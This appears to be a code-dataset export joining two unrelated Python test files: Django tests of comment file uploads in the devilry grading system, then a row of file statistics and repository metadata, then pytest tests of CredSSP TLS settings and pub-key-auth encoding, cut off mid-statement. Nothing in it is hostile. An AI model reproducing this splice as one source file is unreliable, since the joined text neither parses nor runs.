self.assertEqual(b'Test content1', comment_file1.file.file.read())
self.assertEqual(len('Test content1'), comment_file1.filesize)
self.assertEqual('text/txt', comment_file1.mimetype)
# Check content of testfile 2.
self.assertEqual('testfile2.txt', comment_file2.filename)
self.assertEqual(b'Test content2', comment_file2.file.file.read())
self.assertEqual(len('Test content2'), comment_file2.filesize)
self.assertEqual('text/txt', comment_file2.mimetype)
# Check content of testfile 3.
self.assertEqual('testfile3.txt', comment_file3.filename)
self.assertEqual(b'Test content3', comment_file3.file.file.read())
self.assertEqual(len(b'Test content3'), comment_file3.filesize)
self.assertEqual('text/txt', comment_file3.mimetype)
def test_upload_files_and_comment_text(self):
# Test the content of a CommentFile after upload.
testfeedbackset = group_baker.feedbackset_first_attempt_published(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': 'Test comment',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(2, comment_models.CommentFile.objects.count())
self.assertEqual(1, group_models.GroupComment.objects.count())
group_comments = group_models.GroupComment.objects.all()
self.assertEqual('Test comment', group_comments[0].text)
class TestFeedbackfeedExaminerWithAdminDiscussFileUpload(TestCase,
mixin_feedbackfeed_examiner.MixinTestFeedbackfeedExaminer):
viewclass = feedbackfeed_examiner.ExaminerWithAdminsDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_comment_without_text_or_file_visibility_examiners_and_admins(self):
# Tests that error message pops up if trying to post a comment without either text or file.
# Posting comment with visibility for examiners and admins only
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
mockresponse = self.mock_http200_postrequest_htmls(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
}
})
self.assertEqual(0, group_models.GroupComment.objects.count())
self.assertEqual(
'A comment must have either text or a file attached, or both. An empty comment is not allowed.',
mockresponse.selector.one('#error_1_id_text').alltext_normalized)
def test_upload_single_file_visibility_examiners_and_admins(self):
# Test that a CommentFile is created on upload.
# Posting comment with visibility visible to examiners and admins
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfile(
user=testexaminer.relatedexaminer.user)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(1, comment_models.CommentFile.objects.count())
def test_upload_single_file_content_visibility_examiners_and_admins(self):
# Test the content of a CommentFile after upload.
# Posting comment with visibility visible to examiners and admins
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile.txt', content=b'Test content', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(1, comment_models.CommentFile.objects.count())
comment_file = comment_models.CommentFile.objects.all()[0]
self.assertEqual('testfile.txt', comment_file.filename)
self.assertEqual(b'Test content', comment_file.file.file.read())
self.assertEqual(len('Test content'), comment_file.filesize)
self.assertEqual('text/txt', comment_file.mimetype)
def test_upload_multiple_files_visibility_examiners_and_admins(self):
# Test the content of CommentFiles after upload.
# Posting comment with visibility visible to everyone
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'examiner_add_comment_for_examiners': 'unused value',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
def test_upload_multiple_files_contents_visibility_examiners_and_admins(self):
# Test the content of a CommentFile after upload.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'examiner_add_comment_for_examiners': 'unused value',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
comment_file1 = comment_models.CommentFile.objects.get(filename='testfile1.txt')
comment_file2 = comment_models.CommentFile.objects.get(filename='testfile2.txt')
comment_file3 = comment_models.CommentFile.objects.get(filename='testfile3.txt')
# Check content of testfile 1.
self.assertEqual('testfile1.txt', comment_file1.filename)
self.assertEqual(b'Test content1', comment_file1.file.file.read())
self.assertEqual(len('Test content1'), comment_file1.filesize)
self.assertEqual('text/txt', comment_file1.mimetype)
# Check content of testfile 2.
self.assertEqual('testfile2.txt', comment_file2.filename)
self.assertEqual(b'Test content2', comment_file2.file.file.read())
self.assertEqual(len('Test content2'), comment_file2.filesize)
self.assertEqual('text/txt', comment_file2.mimetype)
# Check content of testfile 3.
self.assertEqual('testfile3.txt', comment_file3.filename)
self.assertEqual(b'Test content3', comment_file3.file.file.read())
self.assertEqual(len(b'Test content3'), comment_file3.filesize)
self.assertEqual('text/txt', comment_file3.mimetype)
| 55.591257
| 131
| 0.682342
| 5,056
| 50,866
| 6.617089
| 0.055973
| 0.033357
| 0.028366
| 0.025735
| 0.935378
| 0.925096
| 0.908387
| 0.895116
| 0.881695
| 0.873117
| 0
| 0.009361
| 0.227165
| 50,866
| 914
| 132
| 55.652079
| 0.841698
| 0.027071
| 0
| 0.796319
| 0
| 0.011043
| 0.144405
| 0.065611
| 0
| 0
| 0
| 0
| 0.173006
| 1
| 0.051534
| false
| 0.008589
| 0.017178
| 0
| 0.079755
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dba81fba80a39f3d871a8641f564e7ed9fcb868
| 50,366
|
py
|
Python
|
tests/test_credssp.py
|
DankDumpster/requests-credssp
|
3aeccb9efa8a2e4e34359b1c6b0bc002cd9fde43
|
[
"MIT"
] | 19
|
2016-09-06T19:11:52.000Z
|
2022-03-05T23:30:37.000Z
|
tests/test_credssp.py
|
DankDumpster/requests-credssp
|
3aeccb9efa8a2e4e34359b1c6b0bc002cd9fde43
|
[
"MIT"
] | 24
|
2016-09-02T04:03:34.000Z
|
2022-02-17T05:44:23.000Z
|
tests/test_credssp.py
|
DankDumpster/requests-credssp
|
3aeccb9efa8a2e4e34359b1c6b0bc002cd9fde43
|
[
"MIT"
] | 5
|
2016-10-26T16:08:49.000Z
|
2021-05-10T04:19:15.000Z
|
import collections
import os
import re
import requests
import struct
import warnings
import pytest
from xml.etree import ElementTree as ET
from requests_credssp.credssp import CredSSPContext, HttpCredSSPAuth
from requests_credssp.exceptions import AuthenticationException, InvalidConfigurationException, NTStatusException
WrapResult = collections.namedtuple('WrapResult', ['data'])
class TestCredSSPContext(object):
def test_invalid_auth_mechanism(self):
with pytest.raises(InvalidConfigurationException):
CredSSPContext("", "", "", auth_mechanism="Invalid auth_mechanism supplied fake, must be auto, ntlm, or "
"kerberos")
def test_tls_default(self, monkeypatch):
class SSLContextMock(object):
def __init__(self, type):
assert type == 6
def set_cipher_list(self, cipher):
assert cipher == b'ALL'
monkeypatch.setattr('OpenSSL.SSL.Context', SSLContextMock)
# The testing is actually happening in the mocked functions
CredSSPContext("", "", "")
def test_tls_enable_1_2(self, monkeypatch):
class SSLContextMock(object):
def __init__(self, type):
assert type == 6
def set_cipher_list(self, cipher):
assert cipher == b'ALL'
monkeypatch.setattr('OpenSSL.SSL.Context', SSLContextMock)
# The testing is actually happening in the mocked functions
CredSSPContext("", "", "", disable_tlsv1_2=False)
def test_tls_disable_1_2(self, monkeypatch):
class SSLContextMock(object):
def __init__(self, type):
assert type == 4
def set_cipher_list(self, cipher):
assert cipher == b'ALL'
def set_options(self, options):
assert options == 0x00000800 | 0x00000200
monkeypatch.setattr('OpenSSL.SSL.Context', SSLContextMock)
# The testing is actually happening in the mocked functions
CredSSPContext("", "", "", disable_tlsv1_2=True)
def test_build_pub_key_auth_old_no_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = None
auth_token = None
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x82\x01\x1F" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa3\x82\x01\x16" \
b"\x04\x82\x01\x12" \
b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01" \
b"\x00\x00\x00\x00"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
def test_build_pub_key_auth_old_with_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = None
auth_token = b"\x01\x02\x03\x04"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x82\x01\x2D" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa1\x0C" \
b"\x30\x0A" \
b"\x30\x08" \
b"\xa0\x06" \
b"\x04\x04" \
b"\x01\x02\x03\x04" \
b"\xa3\x82\x01\x16" \
b"\x04\x82\x01\x12" \
b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01" \
b"\x00\x00\x00\x00"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
def test_build_pub_key_auth_new_no_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = b"\xff" * 32
auth_token = None
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x51" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa3\x26" \
b"\x04\x24" \
b"\xe6\x43\x6d\x98\xee\x73\x5a\x5f" \
b"\xba\xe3\x0b\xd7\xd8\x9b\xeb\xb3" \
b"\xec\x28\xf7\xe3\xf9\x6c\x95\xf4" \
b"\x62\xb2\xf5\xe9\x02\xe1\xb6\x38" \
b"\x00\x00\x00\x00" \
b"\xa5\x22" \
b"\x04\x20" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
def test_build_pub_key_auth_new_with_auth(self):
class FakeContext(object):
def wrap(self, data):
# just pads an extra 4 null chars to verify wrap was called
return WrapResult(data + (b"\x00" * 4))
context = FakeContext()
credssp = CredSSPContext("", "", "")
nonce = b"\xff" * 32
auth_token = b"\x01\x02\x03\x04"
public_key = b"\x30\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
b"\xc2\xb4\x3b\x8e\x54\xa2\x57\x26" \
b"\x5a\x66\x28\x64\xfb\xfd\x09\x21" \
b"\xbe\xbd\x93\x97\xc2\x70\x80\x69" \
b"\x99\x36\x37\x71\x0f\x92\x32\x18" \
b"\xe7\x73\x8a\x73\xc6\xdf\xb1\xb7" \
b"\xfb\xf2\xaf\xa3\x84\xaf\x69\x12" \
b"\xe0\xf0\x87\xc7\xb4\x32\x3f\x56" \
b"\xfc\xba\x10\x88\x62\xfb\xa1\x69" \
b"\x30\x22\x89\x04\xdd\x51\xa9\x8e" \
b"\x3e\x7a\x32\x79\x17\x1c\x4f\x47" \
b"\x2b\xf1\xf9\xf4\x1e\x35\x09\xfa" \
b"\x93\x02\x03\x01\x00\x01"
expected = b"\x30\x5F" \
b"\xa0\x03" \
b"\x02\x01" \
b"\x06" \
b"\xa1\x0c" \
b"\x30\x0a" \
b"\x30\x08" \
b"\xa0\x06" \
b"\x04\x04" \
b"\x01\x02\x03\x04" \
b"\xa3\x26" \
b"\x04\x24" \
b"\xe6\x43\x6d\x98\xee\x73\x5a\x5f" \
b"\xba\xe3\x0b\xd7\xd8\x9b\xeb\xb3" \
b"\xec\x28\xf7\xe3\xf9\x6c\x95\xf4" \
b"\x62\xb2\xf5\xe9\x02\xe1\xb6\x38" \
b"\x00\x00\x00\x00" \
b"\xa5\x22" \
b"\x04\x20" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff" \
b"\xff\xff\xff\xff\xff\xff\xff\xff"
actual = credssp._build_pub_key_auth(context, nonce, auth_token,
public_key)
assert actual == expected
def test_verify_pub_key_old(self):
credssp = CredSSPContext("", "", "")
nonce = None
response_key = b"\x31\x82\x01\x0a\x02\x82\x01\x01" \
b"\x00\x9d\xb9\xd2\xd9\x76\x57\x8b" \
b"\x22\x3a\x25\xc5\x4d\xd0\xef\xa9" \
b"\x29\x1e\x7b\x4e\xec\x5e\x13\x00" \
b"\x06\x4e\xba\xad\xf3\x0b\x84\xd9" \
b"\x37\xaf\x2f\x2c\x65\x9e\x9b\xaf" \
b"\x47\xf9\x63\x63\x63\x9f\x7f\x9c" \
b"\xdd\x3e\x85\x96\xb3\x46\x33\x42" \
b"\x0a\x0c\x6d\xee\x67\x78\xa9\xf0" \
b"\x73\xdc\x02\x82\x30\x61\x49\x29" \
b"\xf7\x55\xb3\x43\x68\x40\xfc\xa1" \
b"\x72\xd9\xca\xf3\x1a\xa4\x99\x9d" \
b"\x52\xc3\x98\x1a\x8a\x27\xf8\x8b" \
b"\xb8\xe3\xdc\x1a\x82\x2b\x92\x1e" \
b"\xbc\x50\x8c\xa3\x6a\x1c\x25\x2f" \
b"\x39\xb5\x90\xc5\x56\x19\x01\x03" \
b"\x19\xfb\x01\xc9\x16\x7a\x66\x7c" \
b"\x78\x64\x7b\xd4\xe6\x40\x65\xdb" \
b"\x09\x21\x8e\x8b\xa5\x99\xac\xb3" \
b"\x92\xf2\x46\xf3\xa2\x88\x0b\x48" \
b"\x83\x3f\xbf\x74\xaf\x03\xd4\xf7" \
b"\x50\x52\x3f\xea\xde\xf1\x33\x04" \
